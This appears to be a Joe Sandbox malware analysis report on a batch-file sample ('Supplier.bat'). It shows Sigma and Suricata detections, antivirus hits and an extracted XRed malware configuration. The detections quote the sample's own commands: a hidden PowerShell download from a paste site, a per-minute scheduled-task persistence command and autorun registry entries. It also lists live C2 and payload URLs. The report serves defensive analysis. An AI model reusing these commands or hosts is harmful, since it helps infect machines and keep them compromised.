Sigma detected: PowerShell Download Pattern

Source: Process started

Author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: PowerShell Web Download

Source: Process started

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_DOCX.exe, ProcessId: 6108, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TGWEKK.lnk

Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1, CommandLine: schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8808, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn TGWEKK.exe /tr C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe /sc minute /mo 1, ProcessId: 8900, ProcessName: schtasks.exe

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_DOCX.exe" , ParentImage: C:\Users\user\Desktop\._cache_DOCX.exe, ParentProcessId: 6108, ParentProcessName: ._cache_DOCX.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\TGWEKK.vbs, ProcessId: 2220, ProcessName: wscript.exe

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe, ProcessId: 9212, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", CommandLine|base64offset|contains: >(^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\Supplier.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 8136, ParentProcessName: cmd.exe, ProcessCommandLine: PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/cdfd23f3b9ad', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))", ProcessId: 7320, ProcessName: powershell.exe

Sigma detected: Office Macro File Creation

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 656, TargetFilename: C:\Users\user\AppData\Local\Temp\aQCaWWkc.xlsm

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7512, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE Snake Keylogger Payload Request (GET)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:37:20.703584+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49991	216.58.206.46	443	TCP
2024-12-30T11:37:20.706960+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49992	216.58.206.46	443	TCP
2024-12-30T11:37:21.686585+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49997	216.58.206.46	443	TCP
2024-12-30T11:37:21.689131+0100	2044887	1	A Network Trojan was detected	192.168.2.10	49996	216.58.206.46	443	TCP
2024-12-30T11:37:22.674792+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50002	216.58.206.46	443	TCP
2024-12-30T11:37:22.676481+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50003	216.58.206.46	443	TCP
2024-12-30T11:37:23.800376+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50008	216.58.206.46	443	TCP
2024-12-30T11:37:23.835811+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50007	216.58.206.46	443	TCP
2024-12-30T11:37:24.808609+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50015	216.58.206.46	443	TCP
2024-12-30T11:37:25.473217+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50021	216.58.206.46	443	TCP
2024-12-30T11:37:25.796777+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50023	216.58.206.46	443	TCP
2024-12-30T11:37:26.486373+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50024	216.58.206.46	443	TCP
2024-12-30T11:37:26.814628+0100	2044887	1	A Network Trojan was detected	192.168.2.10	50026	216.58.206.46	443	TCP

ETPRO MALWARE Loda Logger CnC Beacon

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:37:21.522410+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:57.985255+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:38:32.360482+0100	2822116	1	Malware Command and Control Activity Detected	192.168.2.10	50055	172.111.138.100	5552	TCP

ETPRO MALWARE W32.Bloat-A Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:37:21.026098+0100	2832617	1	Malware Command and Control Activity Detected	192.168.2.10	49995	69.42.215.252	80	TCP

ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50042	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50034	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50048	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50050	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50055	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50052	172.111.138.100	5552	TCP
2024-12-30T11:36:22.777444+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:21.522410+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50001	172.111.138.100	5552	TCP
2024-12-30T11:37:30.876086+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50034	172.111.138.100	5552	TCP
2024-12-30T11:37:39.927589+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50042	172.111.138.100	5552	TCP
2024-12-30T11:37:48.939521+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50048	172.111.138.100	5552	TCP
2024-12-30T11:37:57.985255+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50049	172.111.138.100	5552	TCP
2024-12-30T11:38:14.219379+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50050	172.111.138.100	5552	TCP
2024-12-30T11:38:23.267279+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50052	172.111.138.100	5552	TCP
2024-12-30T11:38:32.360482+0100	2849885	1	Malware Command and Control Activity Detected	192.168.2.10	50055	172.111.138.100	5552	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://xred.site50.net/syn/SSLLibrary.dl	Avira URL Cloud: Label: malware
Source: http://xred.site50.net/syn/Synaptics.rar4	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\Synaptics.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Documents\~$cache1	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\AppData\Local\Temp\TGWEKK.vbs	Avira: detection malicious, Label: VBS/Runner.VPJI
Source: C:\ProgramData\Synaptics\RCX1FC6.tmp	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\ProgramData\Synaptics\RCX1FC6.tmp	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
Source: C:\Users\user\Downloads\DOCX.exe	Avira: detection malicious, Label: TR/Dldr.Agent.SH
Source: C:\Users\user\Downloads\DOCX.exe	Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006

Found malware configuration

Source: 42.0.DOCX.exe.400000.0.unpack

Malware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Synaptics\RCX1FC6.tmp	ReversingLabs: Detection: 92%
Source: C:\ProgramData\Synaptics\Synaptics.exe	ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\Desktop\._cache_DOCX.exe	ReversingLabs: Detection: 42%
Source: C:\Users\user\Documents\~$cache1	ReversingLabs: Detection: 92%
Source: C:\Users\user\Downloads\DOCX.exe	ReversingLabs: Detection: 92%

Multi AV Scanner detection for submitted file

Source: Supplier.bat

Virustotal: Detection: 9%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\Synaptics.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\~$cache1	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Synaptics\RCX1FC6.tmp	Joe Sandbox ML: detected
Source: C:\Users\user\Downloads\DOCX.exe	Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Source: unknown	HTTPS traffic detected: 172.67.144.225:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49992 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:49991 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49999 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50003 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50002 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:50022 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.10:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50029 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.10:50032 version: TLS 1.2

Source: DOCX.exe, 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: [autorun]
Source: DOCX.exe, 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: [autorun]
Source: DOCX.exe, 0000002A.00000000.1682512476.0000000000401000.00000020.00000001.01000000.0000000A.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe, 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [autorun]
Source: Synaptics.exe, 00000032.00000003.1789798838.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: autorun.inf
Source: Synaptics.exe.42.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.42.dr	Binary or memory string: [autorun]
Source: Synaptics.exe.42.dr	Binary or memory string: autorun.inf
Source: ~$cache1.50.dr	Binary or memory string: [autorun]
Source: ~$cache1.50.dr	Binary or memory string: [autorun]
Source: ~$cache1.50.dr	Binary or memory string: autorun.inf
Source: RCX1FC6.tmp.42.dr	Binary or memory string: [autorun]
Source: RCX1FC6.tmp.42.dr	Binary or memory string: [autorun]
Source: RCX1FC6.tmp.42.dr	Binary or memory string: autorun.inf
Source: DOCX.exe.38.dr	Binary or memory string: [autorun]
Source: DOCX.exe.38.dr	Binary or memory string: [autorun]
Source: DOCX.exe.38.dr	Binary or memory string: autorun.inf

Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006ADD92 GetFileAttributesW,FindFirstFileW,FindClose,	46_2_006ADD92
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	46_2_006E2044
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	46_2_006E219F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006E24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	46_2_006E24A9
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	46_2_006D6B3F
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006D6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	46_2_006D6E4A
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	46_2_006DF350
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DFD47 FindFirstFileW,FindClose,	46_2_006DFD47
Source: C:\Users\user\Desktop\._cache_DOCX.exe	Code function: 46_2_006DFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	46_2_006DFDD2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00452044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	60_2_00452044
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0045219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	60_2_0045219F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_004524A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	60_2_004524A9
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00446B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	60_2_00446B3F
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_00446E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	60_2_00446E4A
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	60_2_0044F350
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044FD47 FindFirstFileW,FindClose,	60_2_0044FD47
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0044FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	60_2_0044FDD2
Source: C:\Users\user\AppData\Roaming\Windata\XVZBZS.exe	Code function: 60_2_0041DD92 GetFileAttributesW,FindFirstFileW,FindClose,	60_2_0041DD92

Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\Startup\DOCX.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: excel.exe

Memory has grown: Private usage: 1MB later: 66MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.10:50001 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50001 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2832617 - Severity 1 - ETPRO MALWARE W32.Bloat-A Checkin : 192.168.2.10:49995 -> 69.42.215.252:80
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50034 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50042 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50048 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50052 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.10:50049 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50049 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50050 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2822116 - Severity 1 - ETPRO MALWARE Loda Logger CnC Beacon : 192.168.2.10:50055 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2849885 - Severity 1 - ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin : 192.168.2.10:50055 -> 172.111.138.100:5552
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49992 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49997 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50002 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50008 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50007 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49996 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:49991 -> 216.58.206.46:443
